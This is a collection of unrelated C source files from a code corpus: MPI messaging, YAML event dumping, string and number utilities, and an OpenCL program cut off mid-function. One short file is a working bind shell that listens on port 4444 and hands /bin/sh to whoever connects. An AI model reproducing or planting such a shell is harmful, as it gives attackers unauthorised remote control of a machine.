/* An alternative way to implement MPI-based machine layer */ /* Control flows of this scheme: * SEND SIDE: * 1. send a fixed-size small control msg to destination (MPI_Send) * so the ctrl msg buffer can be reused every time. * 2. immediately following the 1st step, send the actual msg (MPI_Isend) * 3. free the buffer for the sent msg * * RECV SIDE: * 1. Pre-post buffers for those small ctrl msgs (MPI_Irecv) * 2. If any ctrl msg is received, issue a (i)recv call for the actual msg * (differentiate small/large msgs) * * MEMORY ALLOCATION: * use MPI_Alloc_mem and MPI_Free_mem so that CmiAllloc/CmiFree needs to be changed */ /* This file contains variables and function declarations that are used for this alternative implementation */ /* This file contains function and variables definitions that are used for this alternative implementation */ #if USE_MPI_CTRLMSG_SCHEME #define CTRL_MSG_TAG (TAG-13) #define USE_NUM_TAGS 1000 static int MPI_CTRL_MSG_CNT=10; static int tags; typedef struct MPICtrlMsgEntry{ int src; int size; int tag; }MPICtrlMsgEntry; typedef struct RecvCtrlMsgEntry{ int bufCnt; MPI_Request *ctrlReqs; /* sizeof(MPI_Request* bufCnt */ MPICtrlMsgEntry *bufs; /*sizeof(MPICtrlMsgEntry)*bufCnt*/ }RecvCtrlMsgEntry; static RecvCtrlMsgEntry recvCtrlMsgList; static void createCtrlMsgIrecvBufs(){ int i; MPICtrlMsgEntry *bufPtr = NULL; MPI_Request *reqPtr = NULL; int count = MPI_CTRL_MSG_CNT; tags = 0; recvCtrlMsgList.bufCnt = count; recvCtrlMsgList.ctrlReqs = (MPI_Request *)malloc(sizeof(MPI_Request)*count); recvCtrlMsgList.bufs = (MPICtrlMsgEntry *)malloc(sizeof(MPICtrlMsgEntry)*count); bufPtr = recvCtrlMsgList.bufs; reqPtr = recvCtrlMsgList.ctrlReqs; for(i=0; i<count; i++, bufPtr++, reqPtr++){ if(MPI_SUCCESS != MPI_Irecv(bufPtr, sizeof(MPICtrlMsgEntry), MPI_BYTE, MPI_ANY_SOURCE, CTRL_MSG_TAG, charmComm, reqPtr)){ CmiAbort("MPI_Irecv failed in creating pre-posted ctrl msg buffers\n"); } } } static void sendViaCtrlMsg(int node, int size, char *msg, SMSG_LIST *smsg){ MPICtrlMsgEntry one; one.src = CmiMyNode(); one.size = size; one.tag = TAG + 100 + tags; tags = (tags+1)%USE_NUM_TAGS; START_TRACE_SENDCOMM(msg); if(MPI_SUCCESS != MPI_Send((void *)&one, sizeof(MPICtrlMsgEntry), MPI_BYTE, node, CTRL_MSG_TAG, charmComm)){ CmiAbort("MPI_Send failed in sending ctrl msg\n"); } if (MPI_SUCCESS != MPI_Isend((void *)msg,size,MPI_BYTE,node,one.tag,charmComm,&(smsg->req))) CmiAbort("MPISendOneMsg: MPI_Isend failed!\n"); END_TRACE_SENDCOMM(msg); } /* returns the size of msg to be received. If there's no msg to be received, then -1 is returned */ static int recvViaCtrlMsg(){ int count = recvCtrlMsgList.bufCnt; MPI_Request *ctrlReqs = recvCtrlMsgList.ctrlReqs; MPICtrlMsgEntry *ctrlMsgs = recvCtrlMsgList.bufs; int completed_index = -1; int flg = 0; int nbytes = -1; MPI_Status sts; if(MPI_SUCCESS != MPI_Testany(count, ctrlReqs, &completed_index, &flg, &sts)){ CmiAbort("MPI_Testany failed for checking if ctrl msg is received\n"); } if(flg){ int src = ctrlMsgs[completed_index].src; int msgsize = ctrlMsgs[completed_index].size; nbytes = msgsize; char *actualMsg = (char *)CmiAlloc(msgsize); IRecvList one = irecvListEntryAllocate(); /* irecv the actual msg */ if(MPI_SUCCESS != MPI_Irecv(actualMsg, msgsize, MPI_BYTE, src, ctrlMsgs[completed_index].tag, charmComm, &(one->req))){ CmiAbort("MPI_Irecv failed after a ctrl msg is received\n"); } /* repost the ctrl msg */ if(MPI_SUCCESS != MPI_Irecv(ctrlMsgs+completed_index, sizeof(MPICtrlMsgEntry), MPI_BYTE, MPI_ANY_SOURCE, CTRL_MSG_TAG, charmComm, ctrlReqs+completed_index)){ CmiAbort("MPI_Irecv failed in re-posting a ctrl msg is received\n"); } one->msg = actualMsg; one->size = msgsize; one->next = NULL; waitIrecvListTail->next = one; waitIrecvListTail = one; } return nbytes; } #endif
the_stack_data/36074356.c
#include <stdio.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> int host_sockid; // socket file descriptor int client_sockid; // client file descriptor struct sockaddr_in hostaddr; // server aka listen address int main() { // Create new TCP socket host_sockid = socket(PF_INET, SOCK_STREAM, 0); // Initialize sockaddr struct to bind socket using it hostaddr.sin_family = AF_INET; // server socket type address family = internet protocol address hostaddr.sin_port = htons(4444); // server port, converted to network byte order hostaddr.sin_addr.s_addr = htonl(INADDR_ANY); // listen to any address, converted to network byte order // Bind socket to IP/Port in sockaddr struct bind(host_sockid, (struct sockaddr*) &hostaddr, sizeof(hostaddr)); // Listen for incoming connections listen(host_sockid, 2); // Accept incoming connection client_sockid = accept(host_sockid, NULL, NULL); // Duplicate file descriptors for STDIN, STDOUT and STDERR dup2(client_sockid, 0); dup2(client_sockid, 1); dup2(client_sockid, 2); // Execute /bin/sh execve("/bin/sh", NULL, NULL); close(host_sockid); return 0; }
the_stack_data/100139919.c
/* limits.c: Illustrates integral limits */ #include <stdio.h> #include <limits.h> int main() { printf("char: [%d, %d]\n", CHAR_MIN, CHAR_MAX); printf("short: [%d, %d]\n", SHRT_MIN, SHRT_MAX); printf("int: [%d, %d]\n", INT_MIN, INT_MAX); printf("long: [%ld, %ld]\n", LONG_MIN, LONG_MAX); return 0; }
the_stack_data/71866.c
int mx_get_substr_index(const char *str, const char *sub); int mx_strncmp(const char *s1, const char *s2, int len); int mx_strlen(const char *s); int main() { printf("%d\n",mx_get_substr_index("McDonalds", "Don")); //returns 2 //printf("%d\n",mx_get_substr_index("", "Don")); //returns -1 //printf("%d\n",mx_get_substr_index("McDonalds", NULL)); //returns -2 //printf("%d\n",mx_get_substr_index(NULL, "Don")); //returns -2 return 0; }
the_stack_data/103264479.c
#include <yaml.h> #include <stdlib.h> #include <stdio.h> int main(int argc, char *argv[]) { int help = 0; int canonical = 0; int unicode = 0; int k; int done = 0; yaml_parser_t parser; yaml_emitter_t emitter; yaml_event_t input_event; yaml_document_t output_document; int root; /* Clear the objects. */ memset(&parser, 0, sizeof(parser)); memset(&emitter, 0, sizeof(emitter)); memset(&input_event, 0, sizeof(input_event)); memset(&output_document, 0, sizeof(output_document)); /* Analyze command line options. */ for (k = 1; k < argc; k ++) { if (strcmp(argv[k], "-h") == 0 || strcmp(argv[k], "--help") == 0) { help = 1; } else if (strcmp(argv[k], "-c") == 0 || strcmp(argv[k], "--canonical") == 0) { canonical = 1; } else if (strcmp(argv[k], "-u") == 0 || strcmp(argv[k], "--unicode") == 0) { unicode = 1; } else { fprintf(stderr, "Unrecognized option: %s\n" "Try `%s --help` for more information.\n", argv[k], argv[0]); return 1; } } /* Display the help string. */ if (help) { printf("%s <input\n" "or\n%s -h | --help\nDeconstruct a YAML stream\n\nOptions:\n" "-h, --help\t\tdisplay this help and exit\n" "-c, --canonical\t\toutput in the canonical YAML format\n" "-u, --unicode\t\toutput unescaped non-ASCII characters\n", argv[0], argv[0]); return 0; } /* Initialize the parser and emitter objects. */ if (!yaml_parser_initialize(&parser)) { fprintf(stderr, "Could not initialize the parser object\n"); return 1; } if (!yaml_emitter_initialize(&emitter)) { yaml_parser_delete(&parser); fprintf(stderr, "Could not inialize the emitter object\n"); return 1; } /* Set the parser parameters. */ yaml_parser_set_input_file(&parser, stdin); /* Set the emitter parameters. */ yaml_emitter_set_output_file(&emitter, stdout); yaml_emitter_set_canonical(&emitter, canonical); yaml_emitter_set_unicode(&emitter, unicode); /* Create and emit the STREAM-START event. */ if (!yaml_emitter_open(&emitter)) goto emitter_error; /* Create a output_document object. */ if (!yaml_document_initialize(&output_document, NULL, NULL, NULL, 0, 0)) goto document_error; /* Create the root sequence. */ root = yaml_document_add_sequence(&output_document, NULL, YAML_BLOCK_SEQUENCE_STYLE); if (!root) goto document_error; /* Loop through the input events. */ while (!done) { int properties, key, value, map, seq; /* Get the next event. */ if (!yaml_parser_parse(&parser, &input_event)) goto parser_error; /* Check if this is the stream end. */ if (input_event.type == YAML_STREAM_END_EVENT) { done = 1; } /* Create a mapping node and attach it to the root sequence. */ properties = yaml_document_add_mapping(&output_document, NULL, YAML_BLOCK_MAPPING_STYLE); if (!properties) goto document_error; if (!yaml_document_append_sequence_item(&output_document, root, properties)) goto document_error; /* Analyze the event. */ switch (input_event.type) { case YAML_STREAM_START_EVENT: /* Add 'type': 'STREAM-START'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "STREAM-START", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'encoding': <encoding>. */ if (input_event.data.stream_start.encoding) { yaml_encoding_t encoding = input_event.data.stream_start.encoding; key = yaml_document_add_scalar(&output_document, NULL, "encoding", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, (encoding == YAML_UTF8_ENCODING ? "utf-8" : encoding == YAML_UTF16LE_ENCODING ? "utf-16-le" : encoding == YAML_UTF16BE_ENCODING ? "utf-16-be" : "unknown"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } break; case YAML_STREAM_END_EVENT: /* Add 'type': 'STREAM-END'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "STREAM-END", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; case YAML_DOCUMENT_START_EVENT: /* Add 'type': 'DOCUMENT-START'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "DOCUMENT-START", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Display the output_document version numbers. */ if (input_event.data.document_start.version_directive) { yaml_version_directive_t *version = input_event.data.document_start.version_directive; char number[64]; /* Add 'version': {}. */ key = yaml_document_add_scalar(&output_document, NULL, "version", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; map = yaml_document_add_mapping(&output_document, NULL, YAML_FLOW_MAPPING_STYLE); if (!map) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, map)) goto document_error; /* Add 'major': <number>. */ key = yaml_document_add_scalar(&output_document, NULL, "major", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; sprintf(number, "%d", version->major); value = yaml_document_add_scalar(&output_document, YAML_INT_TAG, number, -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; /* Add 'minor': <number>. */ key = yaml_document_add_scalar(&output_document, NULL, "minor", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; sprintf(number, "%d", version->minor); value = yaml_document_add_scalar(&output_document, YAML_INT_TAG, number, -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; } /* Display the output_document tag directives. */ if (input_event.data.document_start.tag_directives.start != input_event.data.document_start.tag_directives.end) { yaml_tag_directive_t *tag; /* Add 'tags': []. */ key = yaml_document_add_scalar(&output_document, NULL, "tags", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; seq = yaml_document_add_sequence(&output_document, NULL, YAML_BLOCK_SEQUENCE_STYLE); if (!seq) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, seq)) goto document_error; for (tag = input_event.data.document_start.tag_directives.start; tag != input_event.data.document_start.tag_directives.end; tag ++) { /* Add {}. */ map = yaml_document_add_mapping(&output_document, NULL, YAML_FLOW_MAPPING_STYLE); if (!map) goto document_error; if (!yaml_document_append_sequence_item(&output_document, seq, map)) goto document_error; /* Add 'handle': <handle>. */ key = yaml_document_add_scalar(&output_document, NULL, "handle", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, tag->handle, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; /* Add 'prefix': <prefix>. */ key = yaml_document_add_scalar(&output_document, NULL, "prefix", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, tag->prefix, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; } } /* Add 'implicit': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "implicit", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.document_start.implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; case YAML_DOCUMENT_END_EVENT: /* Add 'type': 'DOCUMENT-END'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "DOCUMENT-END", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'implicit': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "implicit", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.document_end.implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; case YAML_ALIAS_EVENT: /* Add 'type': 'ALIAS'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "ALIAS", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'anchor': <anchor>. */ key = yaml_document_add_scalar(&output_document, NULL, "anchor", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.alias.anchor, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; case YAML_SCALAR_EVENT: /* Add 'type': 'SCALAR'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "SCALAR", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'anchor': <anchor>. */ if (input_event.data.scalar.anchor) { key = yaml_document_add_scalar(&output_document, NULL, "anchor", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.scalar.anchor, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'tag': <tag>. */ if (input_event.data.scalar.tag) { key = yaml_document_add_scalar(&output_document, NULL, "tag", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.scalar.tag, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'value': <value>. */ key = yaml_document_add_scalar(&output_document, NULL, "value", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.scalar.value, input_event.data.scalar.length, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Display if the scalar tag is implicit. */ /* Add 'implicit': {} */ key = yaml_document_add_scalar(&output_document, NULL, "version", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; map = yaml_document_add_mapping(&output_document, NULL, YAML_FLOW_MAPPING_STYLE); if (!map) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, map)) goto document_error; /* Add 'plain': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "plain", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.scalar.plain_implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; /* Add 'quoted': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "quoted", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.scalar.quoted_implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, map, key, value)) goto document_error; /* Display the style information. */ if (input_event.data.scalar.style) { yaml_scalar_style_t style = input_event.data.scalar.style; /* Add 'style': <style>. */ key = yaml_document_add_scalar(&output_document, NULL, "style", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, (style == YAML_PLAIN_SCALAR_STYLE ? "plain" : style == YAML_SINGLE_QUOTED_SCALAR_STYLE ? "single-quoted" : style == YAML_DOUBLE_QUOTED_SCALAR_STYLE ? "double-quoted" : style == YAML_LITERAL_SCALAR_STYLE ? "literal" : style == YAML_FOLDED_SCALAR_STYLE ? "folded" : "unknown"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } break; case YAML_SEQUENCE_START_EVENT: /* Add 'type': 'SEQUENCE-START'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "SEQUENCE-START", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'anchor': <anchor>. */ if (input_event.data.sequence_start.anchor) { key = yaml_document_add_scalar(&output_document, NULL, "anchor", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.sequence_start.anchor, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'tag': <tag>. */ if (input_event.data.sequence_start.tag) { key = yaml_document_add_scalar(&output_document, NULL, "tag", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.sequence_start.tag, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'implicit': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "implicit", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.sequence_start.implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Display the style information. */ if (input_event.data.sequence_start.style) { yaml_sequence_style_t style = input_event.data.sequence_start.style; /* Add 'style': <style>. */ key = yaml_document_add_scalar(&output_document, NULL, "style", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, (style == YAML_BLOCK_SEQUENCE_STYLE ? "block" : style == YAML_FLOW_SEQUENCE_STYLE ? "flow" : "unknown"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } break; case YAML_SEQUENCE_END_EVENT: /* Add 'type': 'SEQUENCE-END'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "SEQUENCE-END", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; case YAML_MAPPING_START_EVENT: /* Add 'type': 'MAPPING-START'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "MAPPING-START", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Add 'anchor': <anchor>. */ if (input_event.data.mapping_start.anchor) { key = yaml_document_add_scalar(&output_document, NULL, "anchor", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.mapping_start.anchor, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'tag': <tag>. */ if (input_event.data.mapping_start.tag) { key = yaml_document_add_scalar(&output_document, NULL, "tag", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, input_event.data.mapping_start.tag, -1, YAML_DOUBLE_QUOTED_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } /* Add 'implicit': <flag>. */ key = yaml_document_add_scalar(&output_document, NULL, "implicit", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, YAML_BOOL_TAG, (input_event.data.mapping_start.implicit ? "true" : "false"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; /* Display the style information. */ if (input_event.data.sequence_start.style) { yaml_sequence_style_t style = input_event.data.mapping_start.style; /* Add 'style': <style>. */ key = yaml_document_add_scalar(&output_document, NULL, "style", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, (style == YAML_BLOCK_MAPPING_STYLE ? "block" : style == YAML_FLOW_MAPPING_STYLE ? "flow" : "unknown"), -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; } break; case YAML_MAPPING_END_EVENT: /* Add 'type': 'MAPPING-END'. */ key = yaml_document_add_scalar(&output_document, NULL, "type", -1, YAML_PLAIN_SCALAR_STYLE); if (!key) goto document_error; value = yaml_document_add_scalar(&output_document, NULL, "MAPPING-END", -1, YAML_PLAIN_SCALAR_STYLE); if (!value) goto document_error; if (!yaml_document_append_mapping_pair(&output_document, properties, key, value)) goto document_error; break; default: /* It couldn't really happen. */ break; } /* Delete the event object. */ yaml_event_delete(&input_event); } if (!yaml_emitter_dump(&emitter, &output_document)) goto emitter_error; if (!yaml_emitter_close(&emitter)) goto emitter_error; yaml_parser_delete(&parser); yaml_emitter_delete(&emitter); return 0; parser_error: /* Display a parser error message. */ switch (parser.error) { case YAML_MEMORY_ERROR: fprintf(stderr, "Memory error: Not enough memory for parsing\n"); break; case YAML_READER_ERROR: if (parser.problem_value != -1) { fprintf(stderr, "Reader error: %s: #%X at %d\n", parser.problem, parser.problem_value, parser.problem_offset); } else { fprintf(stderr, "Reader error: %s at %d\n", parser.problem, parser.problem_offset); } break; case YAML_SCANNER_ERROR: if (parser.context) { fprintf(stderr, "Scanner error: %s at line %d, column %d\n" "%s at line %d, column %d\n", parser.context, parser.context_mark.line+1, parser.context_mark.column+1, parser.problem, parser.problem_mark.line+1, parser.problem_mark.column+1); } else { fprintf(stderr, "Scanner error: %s at line %d, column %d\n", parser.problem, parser.problem_mark.line+1, parser.problem_mark.column+1); } break; case YAML_PARSER_ERROR: if (parser.context) { fprintf(stderr, "Parser error: %s at line %d, column %d\n" "%s at line %d, column %d\n", parser.context, parser.context_mark.line+1, parser.context_mark.column+1, parser.problem, parser.problem_mark.line+1, parser.problem_mark.column+1); } else { fprintf(stderr, "Parser error: %s at line %d, column %d\n", parser.problem, parser.problem_mark.line+1, parser.problem_mark.column+1); } break; default: /* Couldn't happen. */ fprintf(stderr, "Internal error\n"); break; } yaml_event_delete(&input_event); yaml_document_delete(&output_document); yaml_parser_delete(&parser); yaml_emitter_delete(&emitter); return 1; emitter_error: /* Display an emitter error message. */ switch (emitter.error) { case YAML_MEMORY_ERROR: fprintf(stderr, "Memory error: Not enough memory for emitting\n"); break; case YAML_WRITER_ERROR: fprintf(stderr, "Writer error: %s\n", emitter.problem); break; case YAML_EMITTER_ERROR: fprintf(stderr, "Emitter error: %s\n", emitter.problem); break; default: /* Couldn't happen. */ fprintf(stderr, "Internal error\n"); break; } yaml_event_delete(&input_event); yaml_document_delete(&output_document); yaml_parser_delete(&parser); yaml_emitter_delete(&emitter); return 1; document_error: fprintf(stderr, "Memory error: Not enough memory for creating a document\n"); yaml_event_delete(&input_event); yaml_document_delete(&output_document); yaml_parser_delete(&parser); yaml_emitter_delete(&emitter); return 1; }
the_stack_data/247017455.c
//Kiem tra tinh nguyen to cua mot so #include <stdio.h> #include <math.h> int main(){ int n; printf("Moi ban nhap vao mot so nguyen: "); scanf("%i",&n); int kt=1; if (n<2){ kt=0; } for (int i=2;i<=sqrt(n);i++){ if (n%i==0){ kt=0; break; } } if (kt==1){ printf("So %i la so nguyen to.\n",n); } else{ printf("So %i khong la so nguyen to.\n",n); } return 0; }
the_stack_data/111795.c
/* This file is part of The Firekylin Operating System. * * Copyright 2016 Liuxiaofeng * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #include <string.h> size_t strspn(const char *s1, const char *s2) { char *ts1, *ts2; for (ts1 = (char *) s1; *ts1; ts1++) { for (ts2 = (char*) s2; *ts2; ts2++) { if (*ts1 == *ts2) break; } if (*ts2 == '\0') break; } return (size_t) (ts1 - s1); }
the_stack_data/19224.c
/************************************************************************* > File Name: flush.c > Author: mudongliang > Mail: [email protected] > Created Time: Fri 22 May 2015 05:10:22 PM HKT ************************************************************************/ #include<stdio.h> #include<unistd.h> int main(int argc,const char *argv[]) { printf("one"); fork(); printf("two\n"); return 0; }
the_stack_data/73535.c
/* Make sure that side effects in expressions used in array declarations are taken into account. This is not a common feature, but Pierre Villalon has spotted a function call used in an array declaration of some real code. And from a call to a side effect, there is not much. */ int main (int argc, char** argv) { int i = 1; long long size[i++]; return (int) size[0]; }
the_stack_data/218892721.c
#define _CRT_SECURE_NO_WARNINGS #define PROGRAM_FILE "qr.cl" #define KERNEL_FUNC "qr" #define MATRIX_DIM 32 #include <math.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <time.h> #ifdef MAC #include <OpenCL/cl.h> #else #include <CL/cl.h> #endif /* Find a GPU or CPU associated with the first available platform */ cl_device_id create_device() { cl_platform_id platform; cl_device_id dev; int err; /* Identify a platform */ err = clGetPlatformIDs(1, &platform, NULL); if(err < 0) { perror("Couldn't identify a platform"); exit(1); } /* Access a device */ err = clGetDeviceIDs(platform, CL_DEVICE_TYPE_GPU, 1, &dev, NULL); if(err == CL_DEVICE_NOT_FOUND) { err = clGetDeviceIDs(platform, CL_DEVICE_TYPE_CPU, 1, &dev, NULL); } if(err < 0) { perror("Couldn't access any devices"); exit(1); } return dev; } /* Create program from a file and compile it */ cl_program build_program(cl_context ctx, cl_device_id dev, const char* filename) { cl_program program; FILE *program_handle; char *program_buffer, *program_log; size_t program_size, log_size; int err; /* Read program file and place content into buffer */ program_handle = fopen(filename, "r"); if(program_handle == NULL) { perror("Couldn't find the program file"); exit(1); } fseek(program_handle, 0, SEEK_END); program_size = ftell(program_handle); rewind(program_handle); program_buffer = (char*)malloc(program_size + 1); program_buffer[program_size] = '\0'; fread(program_buffer, sizeof(char), program_size, program_handle); fclose(program_handle); /* Create program from file */ program = clCreateProgramWithSource(ctx, 1, (const char**)&program_buffer, &program_size, &err); if(err < 0) { perror("Couldn't create the program"); exit(1); } free(program_buffer); /* Build program */ err = clBuildProgram(program, 0, NULL, NULL, NULL, NULL); if(err < 0) { /* Find size of log and print to std output */ clGetProgramBuildInfo(program, dev, 